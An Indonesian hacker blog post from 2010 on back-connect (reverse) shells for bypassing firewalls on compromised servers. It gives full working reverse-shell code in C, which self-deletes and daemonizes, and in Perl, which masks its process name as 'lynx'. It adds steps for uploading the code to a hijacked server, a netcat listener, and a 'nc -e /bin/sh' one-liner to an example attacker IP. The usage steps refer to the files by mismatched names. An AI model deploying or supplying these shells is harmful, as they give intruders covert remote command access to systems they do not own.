Friday, March 26, 2010

Back Connect

Posted on 1:05 PM by Dian_emon

script yg ini beda ama BindShell. makanya gw sendirikan.
bedanya, klo backconnect, y jelas, untuk melakukan backconnect (koneksi balik) dari shell ke kompi qt, dimana di kompi qt udah di set listening port sehingga shell bisa konek ke kompi qt, dan qt bisa melakukan remote command ke shell. xixixixi.

BackConnect biasanya di pake untuk server yg tertutup proxy or firewall sehingga tidak bisa di lakukan remote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke kompi hacker.

lebih jelasnya :
BindShell :
[SERVER - listening ] <=====[connect]====== [HACKER - remote connect]

klo keadaaanya gini :
[SERVER - listening ] [firewall] X <=====[refushed]====== [HACKER - remote connect]

maka pakai backconnect
BackConnect :
[SERVER - backconnect] ======[connect]=====> [HACKER - listening]

ok. jelas? apa belas? langsong aja yah. ada 2 script pula.

1. backconnect.c

Code:
############################################################
#include
#include
#include
int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in sin;
char rms[21]="rm -f ";
daemon(1,0);
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr.s_addr = inet_addr(argv[1]);
bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
   perror("[-] connect()");
   exit(0);
}
strcat(rms, argv[0]);
system(rms); 
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl("/bin/sh","sh -i", NULL);
close(fd);
}
############################################################

2. backconnect.pl

Code:
##############################################################
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

###############################################################

seip. tinggal pilih aja. mana yg km suka n sesuai ama kondisi shell. klo perl on disarankan pakai backconnect.pl.
cara pakainya :

1. Set listening port di kompi local. pakai netcat.

nc -vlp [port]
misal: nc -vlp 3536

2. backconnect dari shell
yang jelas, y upload bindshell.c or bindshell.pl ke shell km.terserah mo wget, upload langsung, create file, dll. yg penting neh file musti ada di shell.

#pakai bindshell.c
gcc -o bindshell bindshell.c
chmod 777 bindshell
./bindshell [ip.address.kamu] [port]
misal: ./bindshell 202.212.222.223 3536

wait connected. setelah connect, y terserah elu mo apa.
#pakai bindshell.pl

perl bindshell.pl [ip.address.kamu] [port]

misal: perl bindshell.pl 202.212.222.223 3536

wait connected. setelah connect, y suka2 elu deh. mo disconnect lg jg gpp.
OK. OK. mudah banget kan.
cara umum untuk backconnect y pakai netcat.

nc -vv 202.212.222.223 3536 -e /bin/sh

hehe. met mencoba ya.

Labels: , ,

No Response to "Back Connect"

Post a Comment

Subscribe to: Post Comments (Atom)